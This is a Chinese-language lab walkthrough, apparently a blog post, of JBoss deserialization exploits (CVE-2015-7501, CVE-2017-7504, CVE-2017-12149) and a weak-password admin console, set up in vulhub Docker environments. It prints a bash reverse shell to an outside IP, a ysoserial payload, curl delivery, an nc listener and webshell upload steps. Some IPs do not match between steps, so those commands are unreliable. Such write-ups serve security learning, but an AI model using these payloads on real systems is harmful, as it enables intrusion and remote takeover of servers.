常见中间件漏洞:Jboss篇

部署运行你感兴趣的模型镜像

CVE-2015-7501

环境搭建

cd vulhub-master/jboss/JMXInvokerServlet-deserialization

docker-compose up -d

过程

访问网址,存在页面说明接口存在且存在反序列化漏洞

http://8.130.17.222:8080/invoker/JMXInvokerServlet

 

2.下载 ysoserial ⼯具进⾏漏洞利⽤

https://github.com/frohoff/ysoserial

将反弹shell进行base64编码

bash -i >& /dev/tcp/8.130.17.222/6666 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjkyLjE3LzY2NjYgMD4mMSA= 39java8 -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjkyLjE3LzY2NjYgMD4mMSA=}|{base64,-d}| {bash,-i} ">exp.ser

 3.监听端口

nc -lvvp 6666

4.执行命令

curl http://121.40.229.129:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

5.受到监听后反弹成功

CVE-2017-7504

漏洞介绍

41JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的 HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码执行

环境搭建

cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d

过程

访问网站

python3 jexboss.py -u http://8.130.17.222:8080
https://blog.youkuaiyun.com/weixin_44971640/article/details/128313851

CVE-2017-12149

漏洞介绍

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过 滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞

环境搭建

cd vulhub-master/jboss/CVE-2017-12149

docker-compose up -d

过程

访问网站

访问这个网站http://8.130.17.222:8080/invoker/readonly,出现500说明存在

3. 使用工具进行检测 DeserializeExploit 如果成功直接上传webshell即可:工具:
https://cdn.vulhub.org/deserialization/DeserializeExploit.jar
也可以直接执行命令: https://github.com/yunxu1/jboss-_CVE-2017-12149

Administration Console弱口令

漏洞描述

Administration Console管理页面存在弱口令,`admin:admin`,登陆后台上传war包 , getshell

环境搭建

cd vulhub-master/jboss/CVE-2017-12149

docker-compose up -d

密码文件

/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties

账户密码:admin:vulhub

过程

打开网站

http://8.130.17.222:8080/admin-console/login.seam

登录来到后台

点击web应用

上传后门shell压缩包

http://8.130.17.222:8080/shell/1.jsp链接即可

您可能感兴趣的与本文相关的镜像

GPT-oss:20b

GPT-oss:20b

图文对话
Gpt-oss

GPT OSS 是OpenAI 推出的重量级开放模型,面向强推理、智能体任务以及多样化开发场景

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值